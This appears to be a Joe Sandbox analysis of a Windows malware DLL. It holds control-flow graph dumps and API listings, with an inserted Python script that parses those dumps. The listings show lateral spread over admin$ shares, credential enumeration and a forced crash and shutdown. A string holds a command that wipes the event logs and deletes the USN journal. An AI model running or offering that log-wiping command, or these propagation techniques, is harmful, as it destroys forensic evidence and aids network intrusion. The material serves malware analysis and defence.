GetProcessHeap HeapFree GetProcessHeap HeapFree 7594->7596 7601 2e59987 7594->7601 7596->7589 7597->7596 7665 2e56f91 7597->7665 7602 2e59997 7601->7602 7603 2e599b1 wsprintfW 7602->7603 7605 2e59d97 SetLastError 7602->7605 7669 
2e58b70 7603->7669 7605->7597 7608 2e59a2f WNetAddConnection2W wsprintfW PathFindExtensionW 7609 2e59a81 PathFileExistsW 7608->7609 7623 2e59aa2 7608->7623 7611 2e59b17 7609->7611 7612 2e59a98 GetLastError 7609->7612 7610 2e58946 3 API calls 7610->7623 7613 2e59d7c 7611->7613 7612->7623 7613->7605 7616 2e59d83 WNetCancelConnection2W 7613->7616 7614 2e59b24 7617 2e59b43 GetCurrentThread OpenThreadToken 7614->7617 7618 2e59b2e 7614->7618 7615 2e59ac3 GetLastError 7615->7613 7615->7623 7616->7605 7619 2e59b65 DuplicateTokenEx 7617->7619 7638 2e59b7e 7617->7638 7672 2e56ce7 7618->7672 7619->7638 7621 2e59b8c memset 7630 2e59bd5 7621->7630 7621->7638 7622 2e59d58 7626 2e59d6c 7622->7626 7627 2e59d5e CloseHandle 7622->7627 7623->7605 7623->7610 7623->7613 7623->7614 7623->7615 7625 2e59b00 WNetCancelConnection2W 7623->7625 7625->7608 7626->7613 7629 2e59d72 CloseHandle 7626->7629 7627->7626 7629->7613 7631 2e59d4a DeleteFileW 7630->7631 7630->7638 7685 2e597a5 7630->7685 7696 2e598ab 7630->7696 7631->7622 7632 2e59d2b GetLastError 7632->7638 7633 2e59d44 7633->7622 7633->7631 7635 2e59c6c CreateProcessAsUserW 7635->7638 7636 2e59c78 CreateProcessW 7636->7638 7637 2e59c86 WaitForSingleObject GetExitCodeProcess 7637->7638 7639 2e59cb1 CloseHandle 7637->7639 7638->7621 7638->7622 7638->7630 7638->7631 7638->7632 7638->7633 7638->7635 7638->7636 7638->7637 7640 2e59cbd CloseHandle 7638->7640 7641 2e59cc9 CloseHandle 7638->7641 7642 2e59cd5 CloseHandle 7638->7642 7643 2e59ce1 CloseHandle 7638->7643 7644 2e59d17 PathFileExistsW 7638->7644 7639->7638 7640->7638 7641->7638 7642->7638 7643->7638 7644->7638 7646 2e5711f 7 API calls 7645->7646 7651 2e59e29 7646->7651 7647 2e59e97 7647->7591 7648 2e59987 78 API calls 7648->7651 7649 2e59e88 GetProcessHeap HeapFree 7649->7647 7650 2e57167 3 API calls 7650->7651 7651->7647 7651->7648 7651->7649 7651->7650 7653 2e5711f 7 API calls 7652->7653 7664 2e59ee4 7653->7664 7654 2e59f85 7654->7594 7654->7597 7655 2e59ef3 CreateThread 7656 
2e59f26 SetThreadToken 7655->7656 7655->7664 7715 2e59ea4 7655->7715 7658 2e59f35 ResumeThread 7656->7658 7659 2e59f56 CloseHandle 7656->7659 7657 2e59f7d 7714 2e56f78 GetProcessHeap HeapFree 7657->7714 7662 2e59f50 GetLastError 7658->7662 7663 2e59f43 WaitForSingleObject 7658->7663 7659->7664 7660 2e57167 3 API calls 7660->7664 7662->7659 7663->7659 7664->7654 7664->7655 7664->7657 7664->7660 7666 2e56fa3 7665->7666 7666->7666 7667 2e5724d 5 API calls 7666->7667 7668 2e56fc2 7667->7668 7668->7596 7670 2e58b8a wsprintfW 7669->7670 7671 2e58b7b PathFindFileNameW 7669->7671 7670->7608 7671->7670 7673 2e56cff 7672->7673 7673->7673 7674 2e56d0a GetProcessHeap HeapAlloc 7673->7674 7675 2e56dd7 7674->7675 7676 2e56d33 memcpy 7674->7676 7675->7617 7678 2e56d61 7676->7678 7678->7678 7679 2e56d6c GetProcessHeap HeapAlloc 7678->7679 7680 2e56dcc GetProcessHeap HeapFree 7679->7680 7681 2e56d8a memcpy 7679->7681 7680->7675 7707 2e5724d 7681->7707 7686 2e597b2 7685->7686 7687 2e58b70 PathFindFileNameW 7686->7687 7694 2e597cf SetLastError 7687->7694 7689 2e5982b PathFileExistsW 7690 2e5989a 7689->7690 7691 2e59836 wsprintfW wsprintfW 7689->7691 7690->7630 7692 2e56bb0 18 API calls 7691->7692 7693 2e5986d memcpy 7692->7693 7693->7690 7694->7689 7694->7690 7697 2e598b8 7696->7697 7698 2e58b70 PathFindFileNameW 7697->7698 7699 2e598d2 GetSystemDirectoryW 7698->7699 7700 2e598e6 PathAppendW PathFileExistsW 7699->7700 7701 2e59971 GetLastError 7699->7701 7702 2e598fd wsprintfW wsprintfW 7700->7702 7703 2e59977 7700->7703 7701->7703 7704 2e56bb0 18 API calls 7702->7704 7703->7630 7705 2e5993a wsprintfW 7704->7705 7705->7703 7708 2e56dc0 GetProcessHeap HeapFree 7707->7708 7709 2e5725b EnterCriticalSection 7707->7709 7708->7680 7710 2e5726b 7709->7710 7711 2e571d6 3 API calls 7710->7711 7712 2e57279 LeaveCriticalSection 7711->7712 7712->7708 7714->7654 7716 2e59987 78 API calls 7715->7716 7717 2e59ebe 7716->7717 7719 2e59dd0 7718->7719 7720 2e56bb0 18 API calls 7719->7720 7721 2e59de8 
7720->7721 7722 2e59dfc 7721->7722 7723 2e596c7 89 API calls 7721->7723 7722->7456 7723->7722 7724->7454 7726 2e57b28 7725->7726 7727 2e57a4a GlobalAlloc 7725->7727 7735 2e57b31 CredEnumerateW 7726->7735 7728 2e57b27 7727->7728 7733 2e57a63 7727->7733 7728->7726 7729 2e57a66 memset WNetEnumResourceW 7730 2e57b0d GlobalFree WNetCloseEnum 7729->7730 7729->7733 7730->7728 7732 2e57a17 14 API calls 7732->7733 7733->7729 7733->7732 7734 2e56fc7 14 API calls 7733->7734 7734->7733 7736 2e57c08 7735->7736 7737 2e57b5b 7735->7737 7736->7470 7738 2e57bff CredFree 7737->7738 7739 2e56fc7 14 API calls 7737->7739 7740 2e57bfd 7737->7740 7741 2e57bbd 7737->7741 7738->7736 7739->7737 7740->7738 7741->7737 7742 2e56de0 24 API calls 7741->7742 7742->7741 7743->7473 7745 2e58bf5 GetTokenInformation 7744->7745 7746 2e58cb3 GetLastError 7744->7746 7747 2e58c13 GetLastError 7745->7747 7748 2e58ca8 CloseHandle 7745->7748 7749 2e57d60 7746->7749 7750 2e58c25 GlobalAlloc 7747->7750 7753 2e58ca6 7747->7753 7748->7749 7751 2e58ca4 GetLastError 7750->7751 7752 2e58c37 GetTokenInformation 7750->7752 7751->7753 7754 2e58c99 GetLastError 7752->7754 7757 2e58c4a 7752->7757 7753->7748 7755 2e58c9b GlobalFree 7754->7755 7755->7753 7756 2e58c59 GetSidSubAuthorityCount 7756->7757 7757->7755 7757->7756 7758 2e58c6a GetSidSubAuthority 7757->7758 7759 2e58c97 7757->7759 7758->7757 7759->7755 7760 2e5b765 7762 2e5b76f 7760->7762 7761 2e5bc5b 3 API calls 7763 2e5ac62 7761->7763 7762->7761 7762->7763 7803 2e5adcb 7805 2e5addf 7803->7805 7804 2e5aea2 7806 2e5bc5b 3 API calls 7804->7806 7808 2e5ac62 7804->7808 7805->7804 7807 2e5ae74 memcpy 7805->7807 7806->7808 7807->7804 7776 2e56caa 7777 2e56cb5 7776->7777 7778 2e56ce0 7776->7778 7779 2e56cd1 7777->7779 7780 2e56cc9 GetProcessHeap HeapFree 7777->7780 7779->7778 7781 2e56cd8 GetProcessHeap HeapFree 7779->7781 7780->7779 7781->7778 7782 2e56c74 StrCmpIW 7783 2e56ca0 7782->7783 7784 2e56c90 StrCmpW 7782->7784 7784->7783 7785 2e5aa74 7789 2e5a64e 7785->7789 
7786 2e5b8df 7787 2e5bc5b 3 API calls 7786->7787 7788 2e5ac60 7786->7788 7787->7788 7789->7786 7789->7788 7790 2e5aa1f memcpy 7789->7790 7790->7789 7791 2e51f74 7792 2e51f93 7791->7792 7793 2e51fc1 GetProcessHeap HeapAlloc memcpy 7792->7793 7794 2e51fba 7792->7794 7793->7794 7795 2e51feb memcpy 7793->7795 7795->7794 7796 2e52003 memcpy 7795->7796 7796->7794 7797 2e5201f memcpy 7796->7797 7797->7794 7798 2e5203f memcpy 7797->7798 7798->7794 7799 2e5c236 free 7800 2e57d39 7801 2e57d51 7800->7801 7802 2e57d42 DisableThreadLibraryCalls 7800->7802 7802->7801 7819 2e51019 7820 2e51034 7819->7820 7821 2e51022 GetProcessHeap HeapFree 7819->7821 7821->7820
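The node/edge export above is the textual form of Joe Sandbox's control-flow graph. The parser below is an added example, not part of the Joe Sandbox report or of the analysed sample; the token grammar it assumes (node id, address or address range, API names, `call <addr>`, `* <n>`, `<n> API calls` summaries and `<src>-><dst>` edges) is inferred from the dump on this page rather than taken from any documented format, and the two sample inputs are constructed from a handful of its tokens. It recovers per-node API lists and adjacency, so an analyst can ask, for instance, which APIs are reachable from the node that calls socket() at 2e5a2e8.

```python
"""Parse a Joe Sandbox control-flow-graph text export into nodes and edges.

Assumed token grammar (inferred from the export on this page, not a documented format):
  node    ::= <id> (<addr> | <addr>-<addr>) (<api-name> | call <addr> | * <n>)*
  summary ::= <n> API calls           # collapsed callee, attached to the current node
  edge    ::= <id>-><id>
"""
import re
from collections import defaultdict, deque

EDGE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID = re.compile(r"^\d+$")
ADDR = re.compile(r"^[0-9a-f]{6,8}$")  # a pure-digit address would be read as an id (not seen here)
ADDR_RANGE = re.compile(r"^([0-9a-f]{6,8})-([0-9a-f]{6,8})$")
NAME = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def _new_node():
    return {"addr": None, "addr_end": None, "apis": [], "calls": [], "summary": None}


def parse_cfg_dump(text):
    """Return (nodes, edges): nodes maps id -> dict, edges is a list of (src, dst)."""
    toks = text.split()
    nodes, edges = {}, []
    cur = None   # node currently being filled
    last = None  # list the previous name/call went into, for "* <n>" repeats
    i = 0
    while i < len(toks):
        t = toks[i]
        m = EDGE.match(t)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            cur = last = None
            i += 1
            continue
        if NODE_ID.match(t):
            # "<n> API calls" is a collapsed-callee summary for the current node
            if cur is not None and toks[i + 1:i + 3] == ["API", "calls"]:
                nodes[cur]["summary"] = int(t)
                i += 3
                continue
            cur = int(t)
            nodes.setdefault(cur, _new_node())
            last = None
            i += 1
            continue
        if cur is None:  # dangling address or name before any node id (cut-off dump)
            i += 1
            continue
        node = nodes[cur]
        m = ADDR_RANGE.match(t)
        if m:
            node["addr"], node["addr_end"] = m.group(1), m.group(2)
        elif ADDR.match(t):
            if node["addr"] is None:
                node["addr"] = t
        elif t == "call" and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            node["calls"].append(toks[i + 1])
            last = node["calls"]
            i += 1
        elif t == "*" and i + 1 < len(toks) and NODE_ID.match(toks[i + 1]):
            if last:  # "X * n": X appears n times in the block
                last.extend([last[-1]] * (int(toks[i + 1]) - 1))
            i += 1
        elif NAME.match(t):
            node["apis"].append(t)
            last = node["apis"]
        i += 1
    return nodes, edges


def nodes_calling(nodes, api):
    """(id, addr) of every node whose API list contains `api`, sorted by id."""
    return sorted((nid, n["addr"]) for nid, n in nodes.items() if api in n["apis"])


def predecessors(edges, nid):
    return sorted({s for s, d in edges if d == nid})


def apis_reachable(nodes, edges, start):
    """All API names on nodes reachable from `start` (inclusive) along forward edges."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    seen, queue, apis = {start}, deque([start]), set()
    while queue:
        n = queue.popleft()
        if n in nodes:
            apis.update(nodes[n]["apis"])
        for d in succ[n]:
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return apis


# Constructed samples: a few tokens copied from the export above (the socket/connect/select
# probe around 2e5a2e8, and the start of the 2e57deb entry function), not the full dump.
SAMPLE_EDGE_DUMP = (
    "7560 2e5a3d9 7553->7560 7555 2e59193 htonl inet_ntoa "
    "7565 2e5a2e8 memset socket 7560->7565 7566 2e5a345 htons ioctlsocket 7565->7566 "
    "7567 2e5a3cf 7565->7567 7568 2e5a374 connect select 7566->7568 "
    "7569 2e5a3c8 closesocket 7566->7569 7570 2e5a3b3 __WSAFDIsSet 7568->7570 "
    "7571 2e5a3c5 7570->7571 7571->7569 6672 2e5243f 5 API calls 6670->6672"
)
SAMPLE_ENTRY_DUMP = (
    "control_flow_graph 0 2e57deb-2e57e04 call 2e5a4f0 call 2e57cc0 "
    "5 2e57e14-2e57e78 WSAStartup call 2e57091 * 2 InitializeCriticalSection call 2e56a2b 0->5 "
    "6 2e57e06-2e57e0f call 2e59590 0->6 6->5"
)

if __name__ == "__main__":
    nodes, edges = parse_cfg_dump(SAMPLE_EDGE_DUMP)
    print("socket() called at:", nodes_calling(nodes, "socket"))
    print("APIs reachable from 7565:", sorted(apis_reachable(nodes, edges, 7565)))
    entry, _ = parse_cfg_dump(SAMPLE_ENTRY_DUMP)
    print("entry node 5:", entry[5])
```

Run on the first sample, apis_reachable from node 7565 returns exactly the non-blocking connect pattern the export shows at 2e5a2e8 (socket, ioctlsocket, connect, select, __WSAFDIsSet, closesocket); on the second sample the `* 2` repeat and the `call <addr>` targets of the entry function are kept separately from named Windows APIs, so summarised helper calls do not pollute the API list. Pasting the whole export from the page into parse_cfg_dump works the same way; the only known ambiguity is an address made purely of digits, which this grammar would read as a node id.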

                                                Control-flow Graph

                                                control_flow_graph 0 2e57deb-2e57e04 call 2e5a4f0 call 2e57cc0 5 2e57e14-2e57e78 WSAStartup call 2e57091 * 2 InitializeCriticalSection call 2e56a2b 0->5 6 2e57e06-2e57e0f call 2e59590 0->6 14 2e57e84-2e57ea2 call 2e584df CreateThread 5->14 15 2e57e7a-2e57e7f call 2e5835e call 2e58d5a 5->15 6->5 21 2e57ea4-2e57eab 14->21 22 2e57eb2-2e57ec4 call 2e570fa 14->22 15->14 21->22 24 2e57ead call 2e57545 21->24 27 2e57ed4-2e57edb 22->27 28 2e57ec6-2e57ecf call 2e58999 22->28 24->22 30 2e57ff1-2e58041 call 2e570fa CreateThread call 2e58282 GetProcessHeap HeapAlloc 27->30 31 2e57ee1-2e57f06 call 2e57091 call 2e5875a 27->31 28->27 40 2e58043-2e5805c CreateThread 30->40 41 2e5806b-2e58084 Sleep 30->41 31->30 42 2e57f0c-2e57f12 31->42 40->41 43 2e5805e-2e58065 GetProcessHeap HeapFree 40->43 44 2e58086 call 2e51eef 41->44 45 2e5808b-2e5809e Sleep 41->45 46 2e57f15-2e57f32 CreateThread 42->46 43->41 44->45 48 2e580a0-2e580cb memset GetVersionExW 45->48 49 2e5811b-2e58161 Sleep wsprintfW call 2e583bd 45->49 50 2e57f34-2e57f43 SetThreadToken 46->50 51 2e57f69 46->51 48->49 54 2e580cd-2e580da 48->54 66 2e58114-2e58115 ExitProcess 49->66 67 2e58163-2e58170 GetModuleHandleA 49->67 55 2e57f55-2e57f5b GetLastError 50->55 56 2e57f45-2e57f51 ResumeThread 50->56 52 2e57f70-2e57f96 SetLastError CreateThread 51->52 59 2e57fd3-2e57fd6 52->59 60 2e57f98-2e57fa7 SetThreadToken 52->60 62 2e580e6-2e580ed 54->62 63 2e580dc-2e580df 54->63 58 2e57f5e-2e57f67 CloseHandle 55->58 56->52 57 2e57f53 56->57 57->58 58->52 68 2e57fe5-2e57feb 59->68 69 2e57fd8-2e57fe0 call 2e57298 59->69 64 2e57fa9-2e57fb5 ResumeThread 60->64 65 2e57fca-2e57fcd CloseHandle 60->65 62->49 72 2e580ef-2e580f1 62->72 70 2e580e1-2e580e4 63->70 71 2e580f8-2e58112 call 2e56bb0 call 2e57d6f 63->71 74 2e57fc4 GetLastError 64->74 75 2e57fb7-2e57fc2 WaitForSingleObject 64->75 65->59 76 2e58192-2e581a6 InitiateSystemShutdownExW 67->76 77 2e58172-2e58180 GetProcAddress 67->77 68->30 68->46 
69->68 70->62 70->71 71->49 71->66 72->71 79 2e580f3-2e580f6 72->79 74->65 75->65 76->66 82 2e581ac-2e581b5 ExitWindowsEx 76->82 77->76 81 2e58182-2e58190 NtRaiseHardError 77->81 79->49 79->71 81->76 82->66
                                                APIs
                                                  • Part of subcall function 02E57CC0: GetTickCount.KERNEL32 ref: 02E57CCB
                                                  • Part of subcall function 02E57CC0: GetModuleFileNameW.KERNEL32(C:\Windows\dllcm.dat,0000030C,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,02E57E00), ref: 02E57D27
                                                  • Part of subcall function 02E57CC0: CreateFileW.KERNEL32(C:\Windows\dllcm.dat,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02E58AEC
                                                  • Part of subcall function 02E57CC0: GetFileSize.KERNEL32(00000000,00000000), ref: 02E58AFD
                                                  • Part of subcall function 02E57CC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E58B0C
                                                  • Part of subcall function 02E57CC0: HeapAlloc.KERNEL32(00000000), ref: 02E58B13
                                                  • Part of subcall function 02E57CC0: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 02E58B2C
                                                  • Part of subcall function 02E57CC0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E58B3D
                                                  • Part of subcall function 02E57CC0: HeapFree.KERNEL32(00000000), ref: 02E58B44
                                                  • Part of subcall function 02E57CC0: CloseHandle.KERNEL32(?), ref: 02E58B63
                                                • WSAStartup.WS2_32(00000202,02E6F768), ref: 02E57E1E
                                                • InitializeCriticalSection.KERNEL32(02E6F124,00000008,02E56C74,02E56CAA,000000FF,00000024,02E56EDA,00000000,0000FFFF), ref: 02E57E63
                                                • CreateThread.KERNELBASE(00000000,00000000,02E57C10,00000000,00000000,00000000), ref: 02E57E99
                                                • CreateThread.KERNEL32(00000000,00000000,02E59F8E,00000000,00000004,00000000), ref: 02E57F2B
                                                • SetThreadToken.ADVAPI32(?,?), ref: 02E57F3B
                                                • ResumeThread.KERNEL32(?), ref: 02E57F48
                                                • GetLastError.KERNEL32 ref: 02E57F55
                                                • CloseHandle.KERNEL32(?), ref: 02E57F61
                                                • SetLastError.KERNEL32(00000057), ref: 02E57F73
                                                  • Part of subcall function 02E59590: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,02E57E14,?,?,?), ref: 02E595CC
                                                  • Part of subcall function 02E59590: memcpy.MSVCRT ref: 02E595E5
                                                  • Part of subcall function 02E59590: VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 02E59654
                                                  • Part of subcall function 02E59590: VirtualFree.KERNEL32(00000000,?,00004000), ref: 02E59674
                                                • CreateThread.KERNEL32(00000000,00000000,02E57D58,?,00000004,00000000), ref: 02E57F8F
                                                • SetThreadToken.ADVAPI32(000000FF,00000057), ref: 02E57F9F
                                                • ResumeThread.KERNEL32(000000FF), ref: 02E57FAC
                                                • WaitForSingleObject.KERNEL32(000000FF,000000FF), ref: 02E57FBC
                                                • GetLastError.KERNEL32 ref: 02E57FC4
                                                • CloseHandle.KERNEL32(000000FF), ref: 02E57FCD
                                                • CreateThread.KERNELBASE(00000000,00000000,02E5A0FE,00000000,00000000,00000000), ref: 02E58006
                                                • GetProcessHeap.KERNEL32(00000008,00000004,000000FF,?,?,?), ref: 02E58033
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E58036
                                                • CreateThread.KERNELBASE(00000000,00000000,02E5A274,00000000,00000000,00000000), ref: 02E58058
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E58062
                                                • HeapFree.KERNEL32(00000000), ref: 02E58065
                                                • Sleep.KERNELBASE(000000FF), ref: 02E5807B
                                                • Sleep.KERNELBASE(?), ref: 02E58095
                                                • memset.MSVCRT ref: 02E580AE
                                                • GetVersionExW.KERNEL32(?), ref: 02E580C3
                                                • ExitProcess.KERNEL32 ref: 02E58115
                                                • Sleep.KERNELBASE(?), ref: 02E58125
                                                • wsprintfW.USER32 ref: 02E5813B
                                                • GetModuleHandleA.KERNEL32(ntdll.dll,00000003), ref: 02E58168
                                                • GetProcAddress.KERNEL32(00000000,NtRaiseHardError), ref: 02E58178
                                                • NtRaiseHardError.NTDLL(C0000350,00000000,00000000,00000000,00000006,?), ref: 02E58190
                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 02E5819E
                                                • ExitWindowsEx.USER32(00000006,00000000), ref: 02E581AF
                                                Strings
                                                • ntdll.dll, xrefs: 02E58163
                                                • NtRaiseHardError, xrefs: 02E58172
                                                • wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:, xrefs: 02E58135
                                                • W, xrefs: 02E57F69
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
• Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Thread$Heap$Create$Process$ErrorFileHandle$AllocCloseFreeLastSleepVirtual$ExitModuleResumeToken$AddressCountCriticalHardInitializeInitiateNameObjectProcProtectRaiseReadSectionShutdownSingleSizeStartupSystemTickVersionWaitWindowsmemcpymemsetwsprintf
                                                • String ID: NtRaiseHardError$W$ntdll.dll$wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:
                                                • API String ID: 2045654421-1731753139
                                                • Opcode ID: 32cb3f9a3d9f9fa8452769971408a0bc0441f9d53a30ee1a576709779a9e808e
                                                • Instruction ID: 6882a8c26b32a0075dff1757d89960c3331cada64e22c5289fec2b13d28a8aef
                                                • Opcode Fuzzy Hash: 32cb3f9a3d9f9fa8452769971408a0bc0441f9d53a30ee1a576709779a9e808e
                                                • Instruction Fuzzy Hash: EEB1C3709E0369ABDB20DF62DD4DE9B7BB9AF85704F009919FD0596090DB3089E0CB71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                control_flow_graph 85 2e59987-2e599ab call 2e5a4f0 88 2e59d97 85->88 89 2e599b1-2e59a2c wsprintfW call 2e58b70 wsprintfW 85->89 91 2e59d9f-2e59da4 88->91 95 2e59a2f-2e59a7f WNetAddConnection2W wsprintfW PathFindExtensionW 89->95 93 2e59da6-2e59daa 91->93 94 2e59dac-2e59dc0 SetLastError 91->94 93->94 96 2e59a81-2e59a96 PathFileExistsW 95->96 97 2e59aa2-2e59ac1 call 2e58946 95->97 99 2e59b17-2e59b1f 96->99 100 2e59a98-2e59a9e GetLastError 96->100 103 2e59b24-2e59b27 97->103 104 2e59ac3-2e59ad0 GetLastError 97->104 102 2e59d7c-2e59d81 99->102 100->97 102->91 105 2e59d83-2e59d95 WNetCancelConnection2W 102->105 107 2e59b43-2e59b63 GetCurrentThread OpenThreadToken 103->107 108 2e59b29-2e59b2c 103->108 104->102 106 2e59ad6-2e59ad9 104->106 105->91 106->102 109 2e59adf-2e59ae2 106->109 111 2e59b65-2e59b78 DuplicateTokenEx 107->111 112 2e59b7e 107->112 108->107 110 2e59b2e-2e59b39 call 2e56ce7 108->110 109->102 114 2e59ae8-2e59af0 109->114 110->107 111->112 113 2e59b82-2e59b86 112->113 116 2e59b8c-2e59bd3 memset 113->116 117 2e59d58-2e59d5c 113->117 114->102 118 2e59af6-2e59afa 114->118 120 2e59bd5-2e59beb call 2e597a5 116->120 121 2e59bed-2e59bf1 116->121 123 2e59d6c-2e59d70 117->123 124 2e59d5e-2e59d68 CloseHandle 117->124 118->91 122 2e59b00-2e59b12 WNetCancelConnection2W 118->122 120->121 126 2e59c26-2e59c2e 121->126 127 2e59bf3-2e59bf6 121->127 122->95 123->102 128 2e59d72-2e59d76 CloseHandle 123->128 124->123 132 2e59c34-2e59c3c 126->132 133 2e59d2b-2e59d31 GetLastError 126->133 130 2e59bfc-2e59bff 127->130 131 2e59d4a-2e59d52 DeleteFileW 127->131 128->102 130->131 135 2e59c05-2e59c24 call 2e598ab 130->135 131->117 132->133 136 2e59c42-2e59c6a 132->136 134 2e59d35-2e59d3e 133->134 134->113 137 2e59d44-2e59d48 134->137 135->126 139 2e59c6c-2e59c76 CreateProcessAsUserW 136->139 140 2e59c78 CreateProcessW 136->140 137->117 137->131 141 2e59c7e-2e59c80 139->141 140->141 141->133 143 2e59c86-2e59caf WaitForSingleObject 
GetExitCodeProcess 141->143 144 2e59cb7-2e59cbb 143->144 145 2e59cb1-2e59cb5 CloseHandle 143->145 146 2e59cc3-2e59cc7 144->146 147 2e59cbd-2e59cc1 CloseHandle 144->147 145->144 148 2e59ccf-2e59cd3 146->148 149 2e59cc9-2e59ccd CloseHandle 146->149 147->146 150 2e59cd5-2e59cd9 CloseHandle 148->150 151 2e59cdb-2e59cdf 148->151 149->148 150->151 152 2e59ce7-2e59ceb 151->152 153 2e59ce1-2e59ce5 CloseHandle 151->153 154 2e59d00-2e59d04 152->154 155 2e59ced-2e59cf1 152->155 153->152 156 2e59d17-2e59d29 PathFileExistsW 154->156 157 2e59d06-2e59d15 154->157 155->156 158 2e59cf3-2e59cf8 155->158 156->134 157->134 157->156 158->156 159 2e59cfa-2e59cfe 158->159 159->134
                                                APIs
                                                • wsprintfW.USER32 ref: 02E599D1
                                                  • Part of subcall function 02E58B70: PathFindFileNameW.SHLWAPI(C:\Windows\dllcm.dat,?,?,02E59A11), ref: 02E58B80
                                                • wsprintfW.USER32 ref: 02E59A2A
                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 02E59A4C
                                                • wsprintfW.USER32 ref: 02E59A6A
                                                • PathFindExtensionW.SHLWAPI(?), ref: 02E59A77
                                                • PathFileExistsW.SHLWAPI(?), ref: 02E59A8E
                                                • GetLastError.KERNEL32 ref: 02E59A98
                                                • GetLastError.KERNEL32(?,00000001), ref: 02E59AC3
                                                • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 02E59B0C
                                                • GetCurrentThread.KERNEL32 ref: 02E59B54
                                                • OpenThreadToken.ADVAPI32(00000000), ref: 02E59B5B
                                                • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000001,?), ref: 02E59B78
                                                • memset.MSVCRT ref: 02E59BB1
                                                • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02E59C70
                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02E59C78
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02E59C8C
                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 02E59C9F
                                                • CloseHandle.KERNEL32(?), ref: 02E59CB5
                                                • CloseHandle.KERNEL32(?), ref: 02E59CC1
                                                • CloseHandle.KERNEL32(?), ref: 02E59CCD
                                                • CloseHandle.KERNEL32(?), ref: 02E59CD9
                                                • CloseHandle.KERNEL32(?), ref: 02E59CE5
                                                • PathFileExistsW.SHLWAPI(?), ref: 02E59D1F
                                                • GetLastError.KERNEL32 ref: 02E59D2B
                                                • DeleteFileW.KERNEL32(?), ref: 02E59D52
                                                • CloseHandle.KERNEL32(?), ref: 02E59D62
                                                • CloseHandle.KERNEL32(?), ref: 02E59D76
                                                  • Part of subcall function 02E56CE7: GetProcessHeap.KERNEL32(00000008,?,75BF73E0,00000000,?,?,?), ref: 02E56D1D
                                                  • Part of subcall function 02E56CE7: HeapAlloc.KERNEL32(00000000), ref: 02E56D26
                                                  • Part of subcall function 02E56CE7: memcpy.MSVCRT ref: 02E56D53
                                                  • Part of subcall function 02E56CE7: GetProcessHeap.KERNEL32(00000008,?,\\%ws\admin$\%ws), ref: 02E56D78
                                                  • Part of subcall function 02E56CE7: HeapAlloc.KERNEL32(00000000), ref: 02E56D7B
                                                  • Part of subcall function 02E56CE7: memcpy.MSVCRT ref: 02E56DAA
                                                  • Part of subcall function 02E56CE7: GetProcessHeap.KERNEL32(00000000,?,?), ref: 02E56DC7
                                                  • Part of subcall function 02E56CE7: HeapFree.KERNEL32(00000000), ref: 02E56DCA
                                                  • Part of subcall function 02E56CE7: GetProcessHeap.KERNEL32(00000000,?), ref: 02E56DD1
                                                  • Part of subcall function 02E56CE7: HeapFree.KERNEL32(00000000), ref: 02E56DD4
                                                • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 02E59D8F
                                                • SetLastError.KERNEL32(00000057,00000000,?,?,?,02E5A0C9,?,00000000,00000000,00000000), ref: 02E59DB0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
• Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$CloseHandleProcess$ErrorFileLastPath$Connection2wsprintf$AllocCancelCreateExistsFindFreeThreadTokenmemcpy$CodeCurrentDeleteDuplicateExitExtensionNameObjectOpenSingleUserWaitmemset
